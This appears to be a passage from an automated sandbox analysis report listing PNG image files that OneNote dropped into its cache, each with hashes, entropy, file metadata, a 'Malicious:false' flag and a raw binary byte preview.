                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
